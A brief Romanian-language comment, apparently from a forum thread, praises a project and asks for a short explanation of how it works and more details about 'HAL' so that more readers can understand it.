Suna bine! O mica descriere despre cum functioneaza? Cateva detalii despre HAL? Ar fi util ca mai multe persoane sa inteleaga mai bine astfel de lucruri (eu sunt interesat de exemplu).